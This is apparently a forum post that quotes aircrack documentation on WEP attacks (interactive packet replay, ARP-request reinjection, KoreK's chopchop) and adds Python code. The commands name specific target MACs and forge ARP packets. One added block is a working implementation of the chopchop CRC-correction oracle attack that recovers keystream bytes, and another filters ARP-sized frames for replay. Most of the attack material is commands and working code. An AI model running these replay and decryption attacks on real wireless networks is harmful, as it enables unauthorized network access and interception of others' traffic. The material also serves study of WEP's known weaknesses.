I don't see a description of -5.
Attack 2: interactive packet replay
This attack allows you to choose a given packet for replaying; it sometimes gives more
effective results than attack 3 (automatic ARP reinjection).
You could use it, for example, to attempt the "any data re-broadcast" attack, which only
works if the AP actually reencrypts WEP data packets:
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose
size is either 68 or 86 bytes (depending on the operating system):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
Attack 3: ARP-request reinjection
The classic ARP-request replay attack is the most effective to generate new IVs, and works
very reliably. You need either the MAC address of an associated client
(00:09:5B:EB:C5:2B), or a fake MAC from attack 1 (00:11:22:33:44:55). You may have to
wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will
fail if there is no traffic.
Please note that you can also reuse ARP requests from a previous capture using the -r
switch.
aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
Attack 4: KoreK's "chopchop" (CRC prediction)
This attack, when successful, can decrypt a WEP data packet without knowing the key. It
can even work against dynamic WEP. This attack does not recover the WEP key itself, but
merely reveals the plaintext. However, most access points are not vulnerable at all. Some
may seem vulnerable at first but actually drop data packets shorter than 60 bytes. This
attack requires at least one WEP data packet.
1. First, we decrypt one packet:
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
Let's have a look at the IP address:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
2. Then, forge an ARP request.
The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2)
must respond to ARP requests. The source MAC must belong to an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
3. And replay our forged ARP request:
aireplay -2 -r arp.cap ath0
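The heuristic behind attacks 2 and 3 (a WEP frame on the target BSS, sent to the broadcast address, 68 or 86 bytes long, is almost certainly an ARP request, and every replay of it makes the network emit fresh IVs) can be checked offline. The following is an added example, not code from the aircrack documentation quoted above or from the poster: it parses constructed 802.11 data frames, applies that size-plus-broadcast filter, and counts the distinct IVs on the BSS. The frames, the IV values and the zero-filled "encrypted" bodies are constructed for the demo; the 18-byte difference between 68 and 86 is assumed to be Ethernet minimum-length padding added by some operating systems. The frame control bytes 08 41 are the 0841 the text passes with -p (data frame, To-DS, WEP).

```python
BROADCAST = b"\xff" * 6
# Sizes from the text: 24-byte 802.11 header + 4 (IV, key id) + 36 (LLC/SNAP + ARP)
# + 4 (ICV) = 68, or 86 when the sender pads the ARP body to Ethernet minimum length (+18).
WEP_ARP_SIZES = {68, 86}


def parse_data_frame(frame):
    """Return (dst, src, bssid, iv) for a WEP-protected 802.11 data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:                      # type 2 = data
        return None
    to_ds, from_ds, protected = fc1 & 0x01, fc1 & 0x02, fc1 & 0x40
    if not protected or (to_ds and from_ds):       # WDS frames carry a 4th address; skip them
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds:
        bssid, src, dst = a1, a2, a3
    elif from_ds:
        dst, bssid, src = a1, a2, a3
    else:
        dst, src, bssid = a1, a2, a3
    hdr = 26 if fc0 & 0x80 else 24                 # QoS data adds 2 header bytes
    return dst, src, bssid, frame[hdr:hdr + 3]     # the 3-byte IV precedes the key-id byte


def is_wep_arp_request(frame, bssid):
    """The heuristic aireplay relies on: WEP frame on our BSS, to broadcast, of ARP size."""
    parsed = parse_data_frame(frame)
    return (parsed is not None and parsed[2] == bssid
            and parsed[0] == BROADCAST and len(frame) in WEP_ARP_SIZES)


def distinct_ivs(frames, bssid):
    """IVs seen on the BSS: the quantity attack 3's replay loop is there to make grow."""
    return {p[3] for p in map(parse_data_frame, frames) if p and p[2] == bssid}


def build_wep_frame(dst, src, bssid, iv, body, to_ds=True):
    """Constructed frame for the demo; body stands in for encrypted LLC/ARP + ICV.
    Frame control 08 41 is the 0841 the text passes with -p: data, To-DS, WEP."""
    fc = b"\x08\x41" if to_ds else b"\x08\x42"
    addrs = bssid + src + dst if to_ds else dst + bssid + src
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + iv + b"\x00" + body


BSSID = bytes.fromhex("00131030249c")              # AP from the text
STA = bytes.fromhex("00095bebc52b")                # associated station from the text
FRAMES = [                                         # constructed capture, not real traffic
    build_wep_frame(BROADCAST, STA, BSSID, b"\x01\x02\x03", b"\x00" * 40),       # 68 bytes
    build_wep_frame(BROADCAST, STA, BSSID, b"\x01\x02\x04", b"\x00" * 58),       # 86 bytes
    build_wep_frame(STA, BSSID, BSSID, b"\x01\x02\x05", b"\x00" * 40, to_ds=False),  # unicast
    build_wep_frame(BROADCAST, STA, BSSID, b"\x01\x02\x06", b"\x00" * 100),      # not ARP-sized
    build_wep_frame(BROADCAST, STA, bytes.fromhex("000000000001"),
                    b"\x01\x02\x03", b"\x00" * 40),                              # other BSS
]


def arp_candidates(frames, bssid):
    return [f for f in frames if is_wep_arp_request(f, bssid)]


if __name__ == "__main__":
    print(len(arp_candidates(FRAMES, BSSID)), "ARP-sized broadcast frames,",
          len(distinct_ivs(FRAMES, BSSID)), "distinct IVs on", BSSID.hex(":"))
```

Only the two broadcast frames of the documented sizes survive the filter; the unicast reply, the oversized broadcast and the frame from another BSS are rejected, which is why the "this attack will fail if there is no traffic" caveat above holds: without at least one such frame there is nothing to reinject.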
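What makes attack 4 work is the arithmetic the text only names ("CRC prediction"): CRC-32 is linear, so when the last byte of an encrypted frame is cut off there is, for each of the 256 possible values of the removed plaintext byte, one fixed 4-byte XOR patch that makes the shortened frame's ICV valid again, and the patch does not depend on the rest of the frame. The AP then acts as an oracle: it forwards the variant whose guess was right and silently drops the other 255, which reveals one plaintext byte, hence one keystream byte, per chop. The block below is an added example, not part of the aircrack documentation quoted in this post or of aireplay's code: it derives that patch from the CRC table, models the AP as a decrypt-and-check function with the "drops frames shorter than N bytes" behaviour the text warns about, and runs the chop loop against a constructed WEP frame (the LLC/SNAP + ARP plaintext and the fixed fake keystream standing in for RC4(IV || key) are constructed for the demo).

```python
import struct

# Reflected CRC-32 table (polynomial 0xEDB88320); WEP's ICV is this CRC, stored little-endian.
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    TABLE.append(c)
TOP = {t >> 24: i for i, t in enumerate(TABLE)}  # top byte -> table index (unique)


def crc_update(reg, data):
    for b in data:
        reg = (reg >> 8) ^ TABLE[(reg ^ b) & 0xFF]
    return reg


def icv(plaintext):
    return struct.pack("<I", crc_update(0xFFFFFFFF, plaintext) ^ 0xFFFFFFFF)


# Running any "payload || ICV(payload)" through the raw register ends on one constant
# (0xDEBB20E3), so "ICV is correct" and "register == RESIDUE" are the same check.
RESIDUE = crc_update(0xFFFFFFFF, icv(b""))


def forge_tail(reg_before, target):
    """Four bytes that drive the CRC register from reg_before to target."""
    idx, cur = [], target
    for _ in range(4):                      # backwards: each step fixes one table index
        k = TOP[cur >> 24]
        idx.append(k)
        cur = ((cur ^ TABLE[k]) << 8) & 0xFFFFFFFF
    out, reg = bytearray(), reg_before
    for k in reversed(idx):                 # forwards: turn indices into message bytes
        out.append(k ^ (reg & 0xFF))
        reg = (reg >> 8) ^ TABLE[k]
    return bytes(out)


def chop_correction(guess):
    """XOR patch for the last 4 bytes of a frame whose final byte was cut off.
    The patched frame has a valid ICV iff the cut-off plaintext byte was `guess`;
    the patch depends on `guess` only, not on the (unknown) frame contents."""
    k = TOP[RESIDUE >> 24]                  # invert one CRC step: register before the cut byte
    before = (((RESIDUE ^ TABLE[k]) << 8) & 0xFFFFFFFF) | (k ^ guess)
    # CRC is linear: xoring V into the last 4 bytes shifts the final register by crc_update(0, V)
    return forge_tail(0, before ^ RESIDUE)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(plaintext, keystream):
    return xor(plaintext + icv(plaintext), keystream)


def ap_accepts(ciphertext, keystream, min_len=4):
    """Model of the AP: decrypt with the secret keystream, check the ICV, and drop
    frames below min_len (the text notes some APs drop anything under 60 bytes)."""
    if len(ciphertext) < min_len:
        return False
    body = xor(ciphertext, keystream)
    return body[-4:] == icv(body[:-4])


def chopchop(ciphertext, oracle):
    """Recover keystream bytes from the end of the frame using only the AP's
    accept/reject behaviour. Returns {position: keystream byte}."""
    frame, keystream = bytes(ciphertext), {}
    while len(frame) > 4:
        chopped, last = frame[:-1], frame[-1]
        for guess in range(256):
            trial = chopped[:-4] + xor(chopped[-4:], chop_correction(guess))
            if oracle(trial):               # exactly one guess is ever accepted
                keystream[len(frame) - 1] = last ^ guess
                frame = trial               # the accepted frame is itself valid: chop again
                break
        else:
            break                           # every variant dropped: the AP's size floor
    return keystream


def decrypt_tail(ciphertext, keystream):
    """Plaintext (payload and ICV bytes) at the recovered positions, in order."""
    return bytes(ciphertext[i] ^ keystream[i] for i in sorted(keystream))


# Constructed sample: LLC/SNAP + ARP request from 00:09:5B:EB:C5:2B (192.168.1.100)
# for 192.168.1.2, and a fixed fake keystream standing in for RC4(IV || key).
PLAINTEXT = bytes.fromhex(
    "aaaa030000000806" "0001080006040001" "00095bebc52b" "c0a80164"
    "000000000000" "c0a80102")
KEYSTREAM = bytes((i * 97 + 31) & 0xFF for i in range(len(PLAINTEXT) + 4))

if __name__ == "__main__":
    ct = wep_encrypt(PLAINTEXT, KEYSTREAM)
    ks = chopchop(ct, lambda f: ap_accepts(f, KEYSTREAM))
    print(decrypt_tail(ct, ks).hex())
```

With an AP that accepts any well-formed frame, the loop recovers every byte except the first four (a 4-byte frame is the shortest one that still carries an ICV to patch). With the size floor set, recovery stops at that floor, which is the practical reason the text says the attack "may seem vulnerable at first" and then fails: the keystream, and so the plaintext, is only learned for positions above the AP's minimum frame length. The recovered keystream bytes are what the .xor file consumed by arpforge in step 2 holds.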